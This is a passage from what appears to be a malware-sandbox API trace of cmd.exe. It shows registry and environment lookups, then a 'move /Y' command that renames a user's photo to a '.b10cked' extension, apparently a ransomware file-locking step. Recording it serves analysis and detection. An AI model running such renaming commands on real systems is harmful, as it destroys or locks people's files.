AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.946] GetConsoleOutputCP () returned 0x1b5 [0144.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.946] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.946] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.947] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.947] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.947] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.947] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.947] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.947] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.947] GetEnvironmentStringsW () returned 0x4b01b0* [0144.947] FreeEnvironmentStringsW (penv=0x4b01b0) returned 1 [0144.947] GetEnvironmentStringsW () returned 0x4b01b0* [0144.948] FreeEnvironmentStringsW (penv=0x4b01b0) returned 1 [0144.948] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ea5c | out: phkResult=0x30ea5c*=0x40) returned 0x0 [0144.948] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0xe8, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x0, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegCloseKey (hKey=0x40) returned 0x0 [0144.948] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ea5c | out: phkResult=0x30ea5c*=0x40) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x0, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x9, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x9, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x9, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegCloseKey (hKey=0x40) returned 0x0 [0144.948] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.948] srand (_Seed=0x5b886373) [0144.948] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"" [0144.948] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"" [0144.949] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.949] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.949] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.949] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.949] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.949] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.949] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.949] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.949] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.949] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.949] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.949] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.949] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.949] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.949] GetEnvironmentStringsW () returned 0x4b2300* [0144.949] FreeEnvironmentStringsW (penv=0x4b2300) returned 1 [0144.949] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0144.950] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.950] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.950] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.950] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.950] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.950] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.950] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.950] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.950] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.950] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f828 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.950] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f828, lpFilePart=0x30f824 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f824*="Desktop") returned 0x18 [0144.950] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.950] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f5a4 | out: lpFindFileData=0x30f5a4) returned 0x4b0040 [0144.950] FindClose (in: hFindFile=0x4b0040 | out: hFindFile=0x4b0040) returned 1 [0144.950] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f5a4 | out: lpFindFileData=0x30f5a4) returned 0x4b0040 [0144.950] FindClose (in: hFindFile=0x4b0040 | out: hFindFile=0x4b0040) returned 1 [0144.950] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f5a4 | out: lpFindFileData=0x30f5a4) returned 0x4b0040 [0144.950] FindClose (in: hFindFile=0x4b0040 | out: hFindFile=0x4b0040) returned 1 [0144.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.951] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.951] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.951] GetEnvironmentStringsW () returned 0x4b2b20* [0144.951] FreeEnvironmentStringsW (penv=0x4b2b20) returned 1 [0144.951] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.951] GetConsoleOutputCP () returned 0x1b5 [0144.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.951] GetUserDefaultLCID () returned 0x409 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f968, cchData=128 | out: lpLCData="0") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f968, cchData=128 | out: lpLCData="0") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f968, cchData=128 | out: lpLCData="1") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.952] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.953] GetConsoleTitleW (in: lpConsoleTitle=0x4a0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.953] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.953] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.953] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.953] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.954] _wcsicmp (_String1="move", _String2=")") returned 68 [0144.954] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0144.954] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0144.954] _wcsicmp (_String1="IF", _String2="move") returned -4 [0144.954] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0144.954] _wcsicmp (_String1="REM", _String2="move") returned 5 [0144.954] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0144.957] GetConsoleTitleW (in: lpConsoleTitle=0x30f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.957] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0144.957] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0144.957] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0144.957] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0144.957] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="CD") returned 10 
[0144.957] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="REN") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0144.957] _wcsicmp (_String1="move", _String2="SET") returned -6 [0144.957] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0144.957] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0144.957] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0144.957] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0144.957] _wcsicmp (_String1="move", _String2="MD") returned 11 [0144.957] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0144.957] _wcsicmp (_String1="move", _String2="RD") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0144.957] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0144.957] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0144.957] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0144.957] _wcsicmp (_String1="move", _String2="VER") returned -9 [0144.958] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0144.958] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0144.958] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0144.958] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0144.958] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0144.958] _wcsicmp (_String1="move", _String2="START") returned -6 [0144.958] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0144.958] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0144.958] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0144.959] GetDriveTypeW (lpRootPathName="C:\\") 
returned 0x3 [0144.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.959] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f41c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f414, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f414*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) 
returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0144.962] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0144.963] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0144.963] _wcsicmp (_String1="QO_V_I~1.JPG", _String2=".") returned 67 [0144.963] _wcsicmp (_String1="QO_V_I~1.JPG", _String2="..") returned 67 [0144.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_i~1.jpg")) returned 0x20 [0144.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.963] SetErrorMode (uMode=0x0) returned 0x0 [0144.963] SetErrorMode (uMode=0x1) returned 
0x0 [0144.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", nBufferLength=0x104, lpBuffer=0x30eda4, lpFilePart=0x30ed8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", lpFilePart=0x30ed8c*="QO_V_I~1.JPG") returned 0x2f [0144.963] SetErrorMode (uMode=0x0) returned 0x1 [0144.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1")) returned 0x10 [0144.964] _wcsicmp (_String1="QO_V_I~1.JPG", _String2=".") returned 67 [0144.964] _wcsicmp (_String1="QO_V_I~1.JPG", _String2="..") returned 67 [0144.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_i~1.jpg")) returned 0x20 [0144.964] SetErrorMode (uMode=0x0) returned 0x0 [0144.964] SetErrorMode (uMode=0x1) returned 0x0 [0144.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", nBufferLength=0x104, lpBuffer=0x30f220, lpFilePart=0x30efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", lpFilePart=0x30efb8*="QO_V_I~1.JPG") returned 0x2f [0144.964] SetErrorMode (uMode=0x0) returned 0x1 [0144.964] SetErrorMode (uMode=0x0) returned 0x0 [0144.964] SetErrorMode (uMode=0x1) returned 0x0 [0144.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30f428, lpFilePart=0x30efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", lpFilePart=0x30efb8*="QO_v_Iwy7B17SYlN-.jpg.b10cked") returned 0x40 [0144.964] SetErrorMode (uMode=0x0) returned 0x1 [0144.964] SetLastError (dwErrCode=0x0) [0144.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg.b10cked")) returned 0xffffffff [0144.965] 
GetLastError () returned 0x2 [0144.965] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x30e934, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e934) returned 0x4a0ef0 [0144.965] FindNextFileW (in: hFindFile=0x4a0ef0, lpFindFileData=0x30e934 | out: lpFindFileData=0x30e934) returned 0 [0144.965] GetLastError () returned 0x12 [0144.965] FindClose (in: hFindFile=0x4a0ef0 | out: hFindFile=0x4a0ef0) returned 1 [0144.967] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x4b1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b1c30) returned 0x4a0ef0 [0144.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked", lpFilePart=0x0) returned 0x40 [0144.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg", nBufferLength=0x104, lpBuffer=0x30ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg", lpFilePart=0x0) returned 0x38 [0144.967] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg")) returned 0x20 [0144.967] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\qo_v_iwy7b17syln-.jpg.b10cked"), dwFlags=0x3) returned 1 [0144.967] FindClose (in: hFindFile=0x4a0ef0 | out: hFindFile=0x4a0ef0) returned 
1 [0144.968] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30eb80 | out: _Buffer=" 1") returned 9 [0144.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.968] GetFileType (hFile=0x7) returned 0x2 [0145.052] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0145.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30eb0c | out: lpMode=0x30eb0c) returned 1 [0145.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.052] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30eb40 | out: lpConsoleScreenBufferInfo=0x30eb40) returned 1 [0145.052] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0145.053] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30eb80 | out: 